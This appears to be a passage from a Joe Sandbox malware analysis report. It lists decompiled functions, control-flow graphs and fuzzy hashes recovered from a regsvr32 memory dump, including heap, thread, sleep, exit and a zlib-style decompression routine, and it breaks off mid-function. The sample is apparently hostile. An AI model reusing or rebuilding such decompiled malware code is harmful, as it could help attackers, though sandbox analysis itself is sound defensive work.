                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1806447117-0
                                                                                                                                                                        • Opcode ID: cee8b9ce1b98bb507fa6519468d161bb41e8a110eff5b46c5f93b2f523660d0a
                                                                                                                                                                        • Instruction ID: 7308b01e80b318b8d51e29129d36388fc1465719126df12f0d3a2e08c1421762
                                                                                                                                                                        • Opcode Fuzzy Hash: cee8b9ce1b98bb507fa6519468d161bb41e8a110eff5b46c5f93b2f523660d0a
                                                                                                                                                                        • Instruction Fuzzy Hash: 11214F72A00209AFDB11DFAAD885AAEBBF8FF48710B504479E641E7251D734FA018B50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049E6298 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 343 49e6298-49e62b1 call 49e6412 GetOEMCP call 49edf3d 348 49e62b6-49e62e1 call 49f3bd5 343->348 349 49e62b3-49e62b4 343->349 353 49e62eb-49e62f1 call 49ed804 348->353 354 49e62e3-49e62e9 348->354 350 49e632b 349->350 357 49e62f6-49e62fd 353->357 355 49e6305-49e6311 354->355 358 49e6323 call 49e35a1 355->358 359 49e6313-49e6318 call 49e611b 355->359 360 49e62ff 357->360 361 49e631a-49e6321 357->361 365 49e6328-49e632a 358->365 359->365 360->355 361->358 361->365 365->350
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049E6298(void* __fp0) {
				void* __ecx;
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t25;
				void* _t27;

				_t32 = __fp0;
				E049E6412();
				GetOEMCP();
				_t13 = E049EDF3D(__fp0); // executed
				 *0x49ff81c = _t13;
				if(_t13 != 0) {
					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
					_t14 =  *0x49ff81c; // 0x4befbe8
					_t2 = _t14 + 0x224; // 0x49e0000
					E049F3BD5( *_t2);
					_t26 =  *0x49ff81c; // 0x4befbe8
					_t25 = _t27;
					__eflags =  *(_t26 + 0x1898) & 0x00010000;
					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
						_t7 = _t26 + 0x224; // 0x49e0000, executed
						_t26 =  *_t7;
						_t16 = E049ED804( *_t7); // executed
						__eflags = _t16;
						_t17 =  *0x49ff81c; // 0x4befbe8
						if(_t16 != 0) {
							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
								L10:
								__eflags = 0;
								return 0;
							}
							L9:
							E049E35A1();
							goto L10;
						}
						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
						L6:
						_t20 =  *0x49ff81c; // 0x4befbe8
						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
						if(__eflags == 0) {
							goto L9;
						}
						E049E611B(_t25, _t26, __eflags, _t32);
						goto L10;
					}
					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
					goto L6;
				}
				return _t13 + 1;
			}











                                                                                                                                                                        0x049e6298
                                                                                                                                                                        0x049e6298
                                                                                                                                                                        0x049e629d
                                                                                                                                                                        0x049e62a4
                                                                                                                                                                        0x049e62a9
                                                                                                                                                                        0x049e62b1
                                                                                                                                                                        0x049e62ba
                                                                                                                                                                        0x049e62c0
                                                                                                                                                                        0x049e62c5
                                                                                                                                                                        0x049e62cb
                                                                                                                                                                        0x049e62d0
                                                                                                                                                                        0x049e62d6
                                                                                                                                                                        0x049e62d7
                                                                                                                                                                        0x049e62e1
                                                                                                                                                                        0x049e62eb
                                                                                                                                                                        0x049e62eb
                                                                                                                                                                        0x049e62f1
                                                                                                                                                                        0x049e62f6
                                                                                                                                                                        0x049e62f8
                                                                                                                                                                        0x049e62fd
                                                                                                                                                                        0x049e631a
                                                                                                                                                                        0x049e6321
                                                                                                                                                                        0x049e6328
                                                                                                                                                                        0x049e6328
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e632a
                                                                                                                                                                        0x049e6323
                                                                                                                                                                        0x049e6323
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e6323
                                                                                                                                                                        0x049e62ff
                                                                                                                                                                        0x049e6305
                                                                                                                                                                        0x049e6305
                                                                                                                                                                        0x049e630a
                                                                                                                                                                        0x049e6311
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e6313
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e6313
                                                                                                                                                                        0x049e62e3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e62e3
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetOEMCP.KERNEL32 ref: 049E629D
                                                                                                                                                                          • Part of subcall function 049EDF3D: GetCurrentProcessId.KERNEL32 ref: 049EDF64
                                                                                                                                                                          • Part of subcall function 049EDF3D: GetLastError.KERNEL32 ref: 049EE05E
                                                                                                                                                                          • Part of subcall function 049EDF3D: GetSystemMetrics.USER32(00001000), ref: 049EE06E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentErrorLastMetricsProcessSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1196160345-0
                                                                                                                                                                        • Opcode ID: 860c676465053ac40e45eaa149aac20a8df8e32f185c25850d507da149373425
                                                                                                                                                                        • Instruction ID: 663d9bb90c5bc4e10fb593c145fa05bf518eebfe08d543cbd53c6412f3826dcb
                                                                                                                                                                        • Opcode Fuzzy Hash: 860c676465053ac40e45eaa149aac20a8df8e32f185c25850d507da149373425
                                                                                                                                                                        • Instruction Fuzzy Hash: 3901A231208202CFD316EF6AE908BF57BE4EBAA314FD89676E405CB116C7346C42CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EC879 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 366 49ec879-49ec892 368 49ec896-49ec8a3 call 49ec862 366->368 369 49ec894-49ec895 366->369 372 49ec8b9-49ec8c4 FindCloseChangeNotification 368->372 373 49ec8a5-49ec8a8 368->373 376 49ec8c6-49ec8c8 372->376 374 49ec8aa-49ec8af 373->374 375 49ec8b5-49ec8b7 373->375 374->375 375->376
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049EC879(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x49ff820; // 0x4befaa0
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E049EC862(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x49ff818; // 0x4bef8b0
							 *((intOrPtr*)(_t18 + 0x30))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}










                                                                                                                                                                        0x049ec87d
                                                                                                                                                                        0x049ec885
                                                                                                                                                                        0x049ec88d
                                                                                                                                                                        0x049ec892
                                                                                                                                                                        0x049ec89a
                                                                                                                                                                        0x049ec89f
                                                                                                                                                                        0x049ec8a3
                                                                                                                                                                        0x049ec8c1
                                                                                                                                                                        0x049ec8c4
                                                                                                                                                                        0x049ec8a5
                                                                                                                                                                        0x049ec8a8
                                                                                                                                                                        0x049ec8aa
                                                                                                                                                                        0x049ec8b2
                                                                                                                                                                        0x049ec8b2
                                                                                                                                                                        0x049ec8b5
                                                                                                                                                                        0x049ec8b5
                                                                                                                                                                        0x049ec8c8
                                                                                                                                                                        0x049ec895
                                                                                                                                                                        0x049ec895
                                                                                                                                                                        0x049ec895

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 3a0149bd7e9cae0cc59c603a10dd4c4955c804dade2a9698bca27460b384a0b4
                                                                                                                                                                        • Instruction ID: df7ec476e488eb0de627ab38f2a3435345f5e865058cee9b55d93b90c106749c
                                                                                                                                                                        • Opcode Fuzzy Hash: 3a0149bd7e9cae0cc59c603a10dd4c4955c804dade2a9698bca27460b384a0b4
                                                                                                                                                                        • Instruction Fuzzy Hash: 05F03A32A10104EBEB12DBA6DA05EAD77F8FB08745F4141B5E542E7250DB34EE01DB94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049E632E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049E632E() {
				intOrPtr _t3;

				_t3 =  *0x49ff818; // 0x4bef8b0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x49ff83c, 0xffffffff);
				ExitProcess(0);
			}




                                                                                                                                                                        0x049e632e
                                                                                                                                                                        0x049e633b
                                                                                                                                                                        0x049e6345

                                                                                                                                                                        APIs
                                                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 049E6345
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                        • Opcode ID: ad8ca7f5a1d028bc92318cf8aded79a4d312295508ffd13548c8fe700a60da3a
                                                                                                                                                                        • Instruction ID: 340bdbe9217e118cf46f9aebd9f6f4eceeea81786132ddea2ad2ce310b88a14d
                                                                                                                                                                        • Opcode Fuzzy Hash: ad8ca7f5a1d028bc92318cf8aded79a4d312295508ffd13548c8fe700a60da3a
                                                                                                                                                                        • Instruction Fuzzy Hash: 10C002713180109FC7409B64E849F443BE0EB09322F9187B2F52ADA1E9CB2498459B44
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049E8BDE Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049E8BDE(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x49ff900, 8, _a4); // executed
				return _t2;
			}




                                                                                                                                                                        0x049e8bec
                                                                                                                                                                        0x049e8bf3

                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,?,049E959D,00000100,?,049E6507), ref: 049E8BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        • Opcode ID: 4f3b306027d9ec3a19d9bdb444c7c2b2f8fe48b9359d267b71aceb146faeb433
                                                                                                                                                                        • Instruction ID: 27743217b1509f614c5b36582542fb83de3eb6308ca2e243044411e7b677b6b0
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f3b306027d9ec3a19d9bdb444c7c2b2f8fe48b9359d267b71aceb146faeb433
                                                                                                                                                                        • Instruction Fuzzy Hash: 59B0923208820CBBCB011AA5EC05B843F29F704755F044021FA0C04664CB66A8609B84
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EDA57 Relevance: 1.5, APIs: 1, Instructions: 7threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E049EDA57(void* __ecx) {
				signed int _t4;

				_t4 = ResumeThread( *(__ecx + 4));
				asm("sbb eax, eax");
				return  ~_t4 & 0x00000001;
			}




                                                                                                                                                                        0x049eda5f
                                                                                                                                                                        0x049eda67
                                                                                                                                                                        0x049eda6c

                                                                                                                                                                        APIs
                                                                                                                                                                        • ResumeThread.KERNELBASE(?,049ED8C2,?,?,00000001), ref: 049EDA5F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                        • Opcode ID: 7330c5238b5852082813cd20d006dea8f53cc561821079db075a5756552db679
                                                                                                                                                                        • Instruction ID: 25eb9ca2baae2af44d2533bb6d6a1b00632fcb7d3527546479fb3807bff4b7c0
                                                                                                                                                                        • Opcode Fuzzy Hash: 7330c5238b5852082813cd20d006dea8f53cc561821079db075a5756552db679
                                                                                                                                                                        • Instruction Fuzzy Hash: 12B092322A40019BCB004B74E80B9903BE0FB56706BD8C2F0E006C6061C32EC8868A80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049E8BC9 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049E8BC9() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x49ff900 = _t1;
				return _t1;
			}




                                                                                                                                                                        0x049e8bd2
                                                                                                                                                                        0x049e8bd8
                                                                                                                                                                        0x049e8bdd

                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00096000,00000000,049E6502), ref: 049E8BD2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 10892065-0
                                                                                                                                                                        • Opcode ID: 65f8cc11091c0af1127f4e0efe9c563ca8fbd24a204a504a4fc3d418094d1111
                                                                                                                                                                        • Instruction ID: d721ddaa51191e935c12da674fd0e4faed842be38a7f05afe5fdb110039a9f1d
                                                                                                                                                                        • Opcode Fuzzy Hash: 65f8cc11091c0af1127f4e0efe9c563ca8fbd24a204a504a4fc3d418094d1111
                                                                                                                                                                        • Instruction Fuzzy Hash: F7B012B038A30066D6100B205C06F003D10E380B02F100021FA05982C8D7A424509504
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EDA6D Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                        			E049EDA6D(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E049EA0A3(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}









                                                                                                                                                                        0x049eda70
                                                                                                                                                                        0x049eda71
                                                                                                                                                                        0x049eda74
                                                                                                                                                                        0x049eda77
                                                                                                                                                                        0x049eda7c
                                                                                                                                                                        0x049eda7f
                                                                                                                                                                        0x049eda82
                                                                                                                                                                        0x049eda82
                                                                                                                                                                        0x049eda8a
                                                                                                                                                                        0x049eda8f
                                                                                                                                                                        0x049eda92
                                                                                                                                                                        0x049eda95
                                                                                                                                                                        0x049eda98
                                                                                                                                                                        0x049eda9b
                                                                                                                                                                        0x049edaae
                                                                                                                                                                        0x049edaaf
                                                                                                                                                                        0x049edab2
                                                                                                                                                                        0x049edab8
                                                                                                                                                                        0x049edabb
                                                                                                                                                                        0x049edabe
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049edac0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049edabe
                                                                                                                                                                        0x049edac4
                                                                                                                                                                        0x049edac4
                                                                                                                                                                        0x049edac6
                                                                                                                                                                        0x049edac6
                                                                                                                                                                        0x049edac9
                                                                                                                                                                        0x049edac9
                                                                                                                                                                        0x049edace
                                                                                                                                                                        0x049edad6
                                                                                                                                                                        0x049edae2

                                                                                                                                                                        APIs
                                                                                                                                                                        • Sleep.KERNELBASE(0000000A), ref: 049EDAD6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                        • Opcode ID: 0d69a45d888026b698d1312b846e77bc61f009e97e0a5dec510da6dd95671e22
                                                                                                                                                                        • Instruction ID: 2144ee0ae3c9ab9cc165425f2006dbaec5893e837f8a6935368ac51ad23234ff
                                                                                                                                                                        • Opcode Fuzzy Hash: 0d69a45d888026b698d1312b846e77bc61f009e97e0a5dec510da6dd95671e22
                                                                                                                                                                        • Instruction Fuzzy Hash: 03111B71A04206AFEB15CF9AD585AA9B7E8EB88324F148579E85A9B310D374FA40DB40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 049F670F Relevance: 8.1, Strings: 6, Instructions: 577COMMONCrypto
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                        			E049F670F(void* __edi) {
				signed int _t164;
				unsigned int _t172;
				unsigned int _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t179;
				signed int _t182;
				signed int _t184;
				unsigned int _t185;
				int _t186;
				int _t194;
				signed char _t200;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				int _t210;
				int _t222;
				signed int _t227;
				signed int _t235;
				signed int _t251;
				signed char _t252;
				unsigned int _t253;
				signed char _t254;
				signed int* _t255;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t266;
				intOrPtr _t271;
				signed char _t278;
				signed int _t279;
				char* _t280;
				signed int _t282;
				signed char _t284;
				signed int _t287;
				signed int _t291;
				int _t292;
				int _t293;
				int _t296;
				int _t298;
				int _t302;
				signed int _t305;
				signed char _t311;
				signed char _t312;
				signed char _t315;
				signed char _t316;
				signed int _t318;
				int _t319;
				int _t320;
				signed char _t322;
				int _t324;
				int _t326;
				int _t330;
				signed int _t333;
				signed char _t336;
				signed char _t337;
				signed char _t339;
				int _t341;
				signed int _t347;
				int _t349;
				intOrPtr _t350;
				intOrPtr _t351;
				unsigned int _t356;
				unsigned int _t361;
				signed int _t364;
				signed int _t365;
				intOrPtr _t367;
				void* _t368;
				intOrPtr* _t380;
				void* _t381;
				intOrPtr* _t389;
				void* _t390;
				signed int _t395;
				void* _t396;
				signed int _t397;
				void* _t403;
				void* _t405;
				intOrPtr* _t412;
				void* _t413;
				signed int _t414;
				void* _t416;
				intOrPtr* _t423;
				void* _t424;
				unsigned int _t430;
				signed int _t431;
				void* _t434;
				signed int* _t435;
				void* _t439;

				 *((intOrPtr*)(__edi + 0x56))();
				asm("pushfd");
				_t435 = _t434 - 0x40;
				asm("cld");
				_t395 = _t435[0x16];
				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
				_t164 =  *_t395;
				_t435[0xb] = _t164;
				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
				_t271 =  *((intOrPtr*)(_t395 + 0x10));
				_t251 =  *(_t395 + 0xc);
				_t435[0xf] = _t251;
				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
				_t435[4] = _t271 - 0x101 + _t251;
				_t435[2] =  *(_t367 + 0x4c);
				_t435[3] =  *(_t367 + 0x50);
				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
				_t172 =  *(_t367 + 0x28);
				_t347 =  *(_t367 + 0x34);
				_t435[0xd] = _t172;
				_t435[0xc] =  *(_t367 + 0x30);
				_t435[0xe] = _t347;
				_t430 =  *(_t367 + 0x38);
				_t252 =  *(_t367 + 0x3c);
				_t396 = _t435[0xb];
				_t278 = _t435[5];
				if(_t278 > _t396) {
					L2:
					if((_t396 & 0x00000003) != 0) {
						_t396 = _t396 + 1;
						_t278 = _t252;
						_t252 = _t252 + 8;
						_t172 = 0 << _t278;
						_t430 = _t430 | _t172;
						goto L2;
					}
					goto L4;
				} else {
					_t341 = _t278 + 0xb - _t396;
					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
					_t435 =  &(_t435[6]);
					_t278 = 0;
					_t396 =  &(_t435[7]);
					_t435[5] = _t396;
					L4:
					_t368 = _t435[0xf];
					while(1) {
						_t439 =  *0x49fe040 - 2;
						if(_t439 == 0) {
							break;
						}
						if(_t439 > 0) {
							do {
								if(_t252 <= 0xf) {
									asm("lodsw");
									_t322 = _t252;
									_t252 = _t252 + 0x10;
									_t430 = _t431 | 0 << _t322;
								}
								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
								while(1) {
									_t253 = _t252 - _t173;
									_t431 = _t430 >> _t173;
									if(_t173 == 0) {
										asm("stosb");
										goto L22;
									}
									_t356 = _t173 >> 0x10;
									_t311 = _t173;
									if((_t173 & 0x00000010) == 0) {
										if((_t173 & 0x00000040) != 0) {
											L97:
											if((_t173 & 0x00000020) == 0) {
												_t280 = "invalid literal/length code";
												_t350 = 0x1a;
											} else {
												_t280 = 0;
												_t350 = 0xb;
											}
											L101:
											_t174 = _t435[0x16];
											if(_t280 != 0) {
												 *(_t174 + 0x18) = _t280;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
											goto L104;
										}
										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
										continue;
									}
									_t312 = _t311 & 0x0000000f;
									if(_t312 != 0) {
										if(_t253 < _t312) {
											asm("lodsw");
											_t339 = _t253;
											_t253 = _t253 + 0x10;
											_t431 = _t431 | 0 << _t339;
											_t312 = _t339;
										}
										_t253 = _t253 - _t312;
										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
										_t431 = _t431 >> _t312;
										_t356 = _t356 + _t235;
									}
									_t435[6] = _t356;
									if(_t253 <= 0xf) {
										asm("lodsw");
										_t337 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t337;
									}
									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
									while(1) {
										_t361 = _t200 >> 0x10;
										_t253 = _t253 - _t200;
										_t431 = _t431 >> _t200;
										_t315 = _t200;
										if((_t200 & 0x00000010) != 0) {
											break;
										}
										if((_t200 & 0x00000040) != 0) {
											L96:
											_t280 = "invalid distance code";
											_t350 = 0x1a;
											goto L101;
										}
										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
									}
									_t316 = _t315 & 0x0000000f;
									if(_t316 == 0) {
										if(_t361 != 1 || _t435[0xa] == _t368) {
											L38:
											_t435[0xb] = _t396;
											_t207 = _t368 - _t435[0xa];
											if(_t207 < _t361) {
												_t208 = _t435[0xd];
												_t318 =  ~_t207;
												_t414 = _t435[0xe];
												if(_t208 < _t361) {
													L100:
													_t396 = _t435[0xb];
													_t280 = "invalid distance too far back";
													_t350 = 0x1a;
													goto L101;
												}
												_t319 = _t318 + _t361;
												if(_t435[0xc] != 0) {
													_t209 = _t435[0xc];
													if(_t319 <= _t209) {
														_t416 = _t414 + _t209 - _t319;
														_t210 = _t435[6];
														if(_t210 > _t319) {
															_t210 = memcpy(_t368, _t416, _t319);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t319 + _t319;
															_t416 = _t368 - _t361;
														}
													} else {
														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
														_t324 = _t319 - _t209;
														_t210 = _t435[6];
														if(_t210 > _t324) {
															_t210 = memcpy(_t368, _t416, _t324);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t324 + _t324;
															_t416 = _t435[0xe];
															_t326 = _t435[0xc];
															if(_t210 > _t326) {
																_t210 = memcpy(_t368, _t416, _t326);
																_t435 =  &(_t435[3]);
																_t368 = _t416 + _t326 + _t326;
																_t416 = _t368 - _t361;
															}
														}
													}
												} else {
													_t416 = _t414 + _t208 - _t319;
													_t210 = _t435[6];
													if(_t210 > _t319) {
														_t210 = memcpy(_t368, _t416, _t319);
														_t435 =  &(_t435[3]);
														_t368 = _t416 + _t319 + _t319;
														_t416 = _t368 - _t361;
													}
												}
												_t320 = _t210;
												memcpy(_t368, _t416, _t320);
												_t435 =  &(_t435[3]);
												_t368 = _t416 + _t320 + _t320;
												_t396 = _t435[0xb];
												goto L22;
											}
											_t423 = _t368 - _t361;
											_t330 = _t435[6] - 3;
											 *_t368 =  *_t423;
											_t424 = _t423 + 3;
											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
											memcpy(_t368 + 3, _t424, _t330);
											_t435 =  &(_t435[3]);
											_t368 = _t424 + _t330 + _t330;
											_t396 = _t435[0xb];
										} else {
											_t389 = _t368 - 1;
											_t222 =  *_t389;
											_t333 = _t435[6] - 3;
											 *(_t389 + 1) = _t222;
											 *(_t389 + 2) = _t222;
											 *(_t389 + 3) = _t222;
											_t390 = _t389 + 4;
											memset(_t390, _t222, _t333 << 0);
											_t435 =  &(_t435[3]);
											_t368 = _t390 + _t333;
										}
										goto L22;
									}
									if(_t253 < _t316) {
										asm("lodsw");
										_t336 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t336;
										_t316 = _t336;
									}
									_t253 = _t253 - _t316;
									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
									_t431 = _t431 >> _t316;
									_t361 = _t361 + _t227;
									goto L38;
								}
								L22:
							} while (_t435[4] > _t368 && _t435[5] > _t396);
							L104:
							if( *0x49fe040 == 2) {
								_t253 = _t431;
							}
							_t176 = _t435[0x16];
